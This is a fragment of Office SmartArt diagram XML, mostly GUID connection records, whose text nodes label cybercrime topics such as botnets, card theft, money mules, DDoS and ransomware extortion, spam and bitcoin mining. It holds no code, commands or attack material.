    <dgm:cxn modelId="{CE9EB74F-AEC5-47DC-9EF8-B4477C1A287A}" type="presParOf" srcId="{F5BC157C-6675-4525-990D-2ED8D5B15D19}" destId="{373B664B-674C-4A80-85B5-9DAC5DAD84EB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F3153605-E038-43C6-8173-47C2C51C345E}" type="presParOf" srcId="{373B664B-674C-4A80-85B5-9DAC5DAD84EB}" destId="{DD159A7B-5084-481D-94B7-435977B6A330}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{50E2778B-6F1E-4904-BA67-8AC8831940E0}" type="presParOf" srcId="{373B664B-674C-4A80-85B5-9DAC5DAD84EB}" destId="{7B3C408C-5608-4831-B12C-A33DEC51656E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{25355E98-D613-4B0B-9B73-F5F5AFC5C8AF}" type="presParOf" srcId="{7B3C408C-5608-4831-B12C-A33DEC51656E}" destId="{14EE185D-BE9C-4424-99AD-D11C8BEE0D95}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{328FAF04-0525-49C1-8589-72BCAB870887}" type="presParOf" srcId="{14EE185D-BE9C-4424-99AD-D11C8BEE0D95}" destId="{0ABA8841-2E13-4EE7-9600-D939414EE2BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9AB82E55-D5EE-40D6-BB39-032663169B66}" type="presParOf" srcId="{14EE185D-BE9C-4424-99AD-D11C8BEE0D95}" destId="{0997F7E9-9C03-4C4C-9760-95BB29039A01}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B6EB9603-8BC6-4379-B00F-EBBF4AB0685B}" type="presParOf" srcId="{7B3C408C-5608-4831-B12C-A33DEC51656E}" destId="{F8CB2E3D-83C7-464A-BD86-88D0DE5EC0B9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AA55653C-B9C4-42F3-93E3-F3736B278007}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{8BD2CCC9-A5CD-45F3-BA34-8716B2A7CFB1}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4EA3D8E9-9530-4952-BB1D-1759969C3C38}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{9D2C08D0-E0F0-40F1-945E-8118EE39E546}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7802E45E-E5EE-4B77-9F4C-D4C17C498B2E}" type="presParOf" srcId="{9D2C08D0-E0F0-40F1-945E-8118EE39E546}" destId="{3269FA4C-D252-4BF3-8FD7-3EF0B0EB4DC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{471992AE-CE60-4029-B212-FBD385815630}" type="presParOf" srcId="{3269FA4C-D252-4BF3-8FD7-3EF0B0EB4DC5}" destId="{D25DF860-47FD-42F0-B603-5671C9C185E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB285F94-71EA-4369-BDBE-436B8BF7B437}" type="presParOf" srcId="{3269FA4C-D252-4BF3-8FD7-3EF0B0EB4DC5}" destId="{2DC6BE09-6C35-45D2-A751-D4BF107EE4F9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{90F78E9E-B0EA-431D-BEE4-D3D28F62E420}" type="presParOf" srcId="{9D2C08D0-E0F0-40F1-945E-8118EE39E546}" destId="{3476964E-2C32-4025-9130-A9EBDC581214}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0583537B-E334-4C98-BD97-A42956CD101A}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DB06ADF-5D22-4867-A9A8-3ACC6EA49E1E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{275578A9-19CC-465B-9812-867FFDAB9B66}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{A1D52E2D-12F9-44FE-BAA9-BF77EBFF9477}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{831EEDB7-B1FE-482F-B5F4-C99481D8018D}" type="presParOf" srcId="{A1D52E2D-12F9-44FE-BAA9-BF77EBFF9477}" destId="{C44B8C40-DDE4-4680-B610-2F752476D7CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{110162B7-3715-4B4B-A781-74A9927C3BED}" type="presParOf" srcId="{C44B8C40-DDE4-4680-B610-2F752476D7CD}" destId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DD613A97-4327-4B64-A7FC-AA5BE4307230}" type="presParOf" srcId="{C44B8C40-DDE4-4680-B610-2F752476D7CD}" destId="{2987343F-C488-4AC1-A4FD-C02C38DCC47B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE0F1ECD-32AA-4BC0-A5D3-6B9541005EF9}" type="presParOf" srcId="{A1D52E2D-12F9-44FE-BAA9-BF77EBFF9477}" destId="{DFB7B5A5-9481-448F-9F82-73AB43F777C1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9FEC087B-6D91-4635-BD8E-297105DA8CEC}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{2E8E46D9-FBC5-4AA6-9A5D-86A5A084592D}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B3AE1531-8E15-4BE9-94B9-1CC06699C937}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ED8460A9-D5F2-4DB8-9253-A88A15090506}" type="presParOf" srcId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" destId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B84FD058-13FC-4E36-B1CC-EB1B422DFEAB}" type="presParOf" srcId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" destId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{FE6380F8-BBC0-4FF0-84C6-3AE5DFB9A885}" type="presParOf" srcId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" destId="{A5B2796D-E837-4404-9852-61F32C250BFA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB897544-2E25-42DF-BE50-F555D972762D}" type="presParOf" srcId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" destId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB5FB326-C7F3-4C7A-91B4-72706DE60842}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{73DC0BED-9251-4B5C-8191-EE587DFF262E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6F6255F1-F40C-4185-BC76-BB573C6D6D68}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{29C1F1F2-865C-4369-B5AA-00425125198E}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{94284893-A642-4B31-9860-93FA57778DCA}" type="presParOf" srcId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" destId="{47F209D6-A50F-4593-8101-495466DA161C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B32B2F53-F315-416E-8665-4FB3FF1858B0}" type="presParOf" srcId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" destId="{98617AD6-2A5A-4CC4-817B-C33D1FB1B247}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E4E50648-66B0-4B93-9C04-4D70D4C390D4}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{44FEA90B-B9F0-4838-A33A-C2D7921EB239}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C6E79500-C5CB-4E73-BA17-B6D9BCE88DE2}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{493BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DD6FF320-BA5D-4D63-BE54-468A9BE1ABC8}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{30E2F406-52B6-4843-8762-19EE82C6795D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7D5B285A-DD70-4CB2-83CA-363AC56158E5}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{846994CE-CB32-4B54-9243-F462A1BAB8D6}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{11BDAE4A-BDED-4A8E-B175-FF65C957881B}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{89825871-887C-4144-92E4-0CD1C779523E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{BE544174-B4AF-4ACC-B8C4-4A81C82B51D3}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{A382E3D8-F167-402C-95ED-E85E712B3958}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB97D865-4F7E-43FB-A2BD-0B3C980F8B8D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{AC97DC07-675E-4CF3-9913-C7CB3E6FE0DB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A1E0EB1C-BCB0-40B7-85BC-0ACFABA3374D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9F17A1D6-89D0-479D-9E04-BB7ABFD5CE57}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67966BE4-FE5C-4570-9440-292AFFDB4ECC}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5B4386DD-F917-43FB-BD7A-792114CE85BD}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{769CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D68CB307-387B-4B02-BB59-4F8D93E9BECE}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{F80F370F-4960-4A7F-8CDD-3F645777D926}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C7262EEE-09B2-4C39-B93D-0C6697BFCA6B}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1164DF9C-47B4-4930-BF8C-FB83C56F57E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9ABDAE99-4AA9-4F09-8D3E-8A19AF57C419}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A778D506-92B5-4FC9-8988-820EDFBF4190}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67965192-6709-4753-B296-83A5E275D540}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{49871D27-F564-45D4-9535-E5D3429C61C3}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{1DE75C67-9F60-4DCF-8A09-6EBB5AA047F8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72988983-F36C-49B8-9178-884F57BA9842}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{3E089C12-00A1-4C52-ACA6-DA689DC530B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D3D7B3E0-2DE8-4C73-8092-27B984FFF627}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{DCB922D2-A971-46B6-8A66-A63871EC5D71}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{913BBCA6-6A15-4081-ACFB-D98F477B7550}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1BE63070-B619-415B-AE72-C4895210C2ED}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{88885C49-E13F-46DB-BD55-02549CE6B683}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{39DE0E1E-A457-4031-A6D1-C04DDA15C6D9}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{26F2BD33-885F-4A44-82C7-4A65EBFA30E6}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{D7493045-F4D0-49BB-8749-0235A8D3915E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F54E657B-FEC8-4658-B618-9477ABD53598}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{E562E629-8E7C-4C02-A214-F4E36EE87E99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE993755-C27B-4D66-B7FA-337056FF690B}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{B2CAA67D-ED33-4120-9634-DF98516FB005}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4BC450DA-C7E2-4383-A9BD-D326CF26687E}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B0B4EB34-DD2F-4309-B751-E58D5D591CAF}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9532000B-227B-4799-A1D1-6E51BB4EC17B}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{A20E9766-61CD-4711-B99D-41622BFCA782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D0537B6E-16F4-4A9A-A7DF-AE2F524FE785}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{E1CF22F3-AC19-46C9-A82F-89D8DB189CE8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E619EEAD-D932-4228-A171-FDFC2A3FA229}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{4A7C2F52-ACA9-4730-89EA-B234D19B30FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AC723CA2-7799-4818-B6E1-D9570D14FB31}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{CE2BD6A2-C6A6-4AE7-8716-F62AC787B4F6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{137C7443-E818-4254-BC58-ED1832584EF8}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{124F88C5-C1D5-4402-8050-69A3610B0063}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0B5E36FB-CF72-4F52-8173-8D0CCEDA9AF4}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DC7E7830-0E48-4050-9CC0-FF34AA022703}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2CA4696A-F32D-4557-9668-86E3DEF687D3}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{F83FE0F9-C0AD-41ED-8499-585D4FDF8177}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E8990450-3DB7-4904-A625-F1E80A3C4A27}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{E3521F4E-CD84-466B-AF37-02AB70C55B9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20B35F-2635-4F8F-9051-2B1A318D39FF}"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B632587F-1A59-4B58-8F39-3F88332608F5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Botnets</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E780597-A9D7-4E6A-B969-7F37A974753C}" type="parTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAFC8618-BD8D-4D8C-BB34-17C52689EDA4}" type="sibTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F06AC04-9C84-4A47-BFDD-AE87232D1106}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E7D7A7B-2ADD-469E-B0F8-D565F03F46F9}" type="parTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C404C4-6211-4C8B-9140-D0533EAFE621}" type="sibTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F920927-1A73-470C-97F0-75ABFA67423F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B2D1F3B-F359-4548-91E0-0C2AC7CCD7A1}" type="parTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79406963-93E8-4610-9E27-FEFF794E3AB0}" type="sibTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426355DA-85B0-49DB-B723-939237685E7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05039FCC-4F08-4EEE-ACAE-BAC85EFDD1D7}" type="parTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DCF50B-90BE-4C41-AAFB-5990C2737070}" type="sibTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03A48CFA-6496-41BF-A746-80A181C3C3DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Spam</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72633D96-4A27-4E50-A39C-37AB41EEA9FE}" type="parTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E5E1350-FE66-4F91-840A-B3A1E5069B7E}" type="sibTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45F34A96-294F-4F91-858C-0CCFEC2CFF6B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3BBBB2C-8F74-4541-A78F-D9AB9652D44B}" type="parTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AD622BB-3D20-4961-90A9-7E3A3EAB1155}" type="sibTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
